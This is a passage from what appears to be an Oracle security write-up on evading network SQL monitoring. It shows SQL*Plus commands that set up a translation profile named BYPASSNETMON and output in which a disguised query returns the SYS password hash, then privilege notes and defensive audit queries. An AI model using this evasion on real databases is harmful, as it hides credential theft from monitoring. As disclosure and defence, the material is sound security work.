PL/SQL procedure successfully completed.
SQL> grant all on sql translation profile BYPASSNETMON to public;
Grant succeeded.
SQL> alter session set sql_translation_profile = BYPASSNETMON;
Session altered.
SQL> alter session set events = '10601 trace name context forever, level 32';
Session altered.
SQL> select username from dba_users;
USER
------------------------------
PASSWORD
----------------------------------------
SYS
987B14B42862C0C1
Which users can use this facility? The privileges required for this bypass are CREATE SQL TRANSLATION
PROFILE and ALTER SESSION, as well as EXECUTE on DBMS_SQL_TRANSLATOR, which is granted to PUBLIC. The package
runs with invoker's rights, so it can only execute SQL that the invoker already has rights to. What the invoker gains is
the ability to hide their SQL, which makes network monitoring solutions such as Imperva, Guardium and SNORT less effective.
SQL> SELECT GRANTEE FROM DBA_TAB_PRIVS WHERE TABLE_NAME='DBMS_SQL_TRANSLATOR';
GRANTEE
--------------------------------------------------------------------------------
PUBLIC
How does one protect against this? Check that no erroneous profiles are being created, or audit for the
use of DBMS_SQL_TRANSLATOR:
SQL> SELECT * FROM DBA_SQL_TRANSLATION_PROFILES;
OWNER
--------------------------------------------------------------------------------
PROFILE_NAME
--------------------------------------------------------------------------------
TRANSLATOR
--------------------------------------------------------------------------------
FOREI TRANS RAISE LOG_T TRACE
----- ----- ----- ----- -----
SYS
BYPASSNETMON
TRUE TRUE FALSE FALSE FALSE
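The two checks above can be extended into a repeatable review. The following is an added example, not part of the original text: it assumes a DBA account, unified auditing (Oracle 12c or later), and a hypothetical policy name SQL_TRANSLATOR_USE_POL; that grants on translation profiles surface in DBA_TAB_PRIVS is also an assumption to confirm on your release.

```sql
-- 1. What each profile actually rewrites: the statement a network monitor
--    sees (original_sql) next to the statement the database runs.
SELECT t.owner, t.profile_name, t.enabled,
       DBMS_LOB.SUBSTR(t.sql_text, 200, 1)        AS original_sql,
       DBMS_LOB.SUBSTR(t.translated_text, 200, 1) AS translated_sql
FROM   dba_sql_translations t
ORDER  BY t.owner, t.profile_name;

-- 2. Who holds the system privileges needed to create or use profiles.
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege LIKE '%SQL TRANSLATION PROFILE'
   OR  privilege = 'TRANSLATE ANY SQL'
ORDER  BY grantee, privilege;

-- 3. Object grants on existing profiles, e.g. the GRANT ALL ... TO PUBLIC
--    shown earlier. Assumption: profile grants are listed in DBA_TAB_PRIVS
--    with TABLE_NAME holding the profile name.
SELECT p.grantee, p.owner, p.table_name AS profile_name, p.privilege
FROM   dba_tab_privs p
JOIN   dba_sql_translation_profiles tp
       ON  tp.owner = p.owner
       AND tp.profile_name = p.table_name
ORDER  BY p.owner, p.table_name, p.grantee;

-- 4. Audit every call into the package (policy name is hypothetical).
CREATE AUDIT POLICY sql_translator_use_pol
  ACTIONS EXECUTE ON SYS.DBMS_SQL_TRANSLATOR;

AUDIT POLICY sql_translator_use_pol;

-- 5. Review what the policy has captured.
SELECT event_timestamp, dbusername, action_name,
       object_schema, object_name, sql_text
FROM   unified_audit_trail
WHERE  object_schema = 'SYS'
AND    object_name   = 'DBMS_SQL_TRANSLATOR'
ORDER  BY event_timestamp DESC;
```

Any row from query 1 whose translated_sql reads data that original_sql does not mention deserves investigation, as does any non-administrative grantee returned by queries 2 and 3.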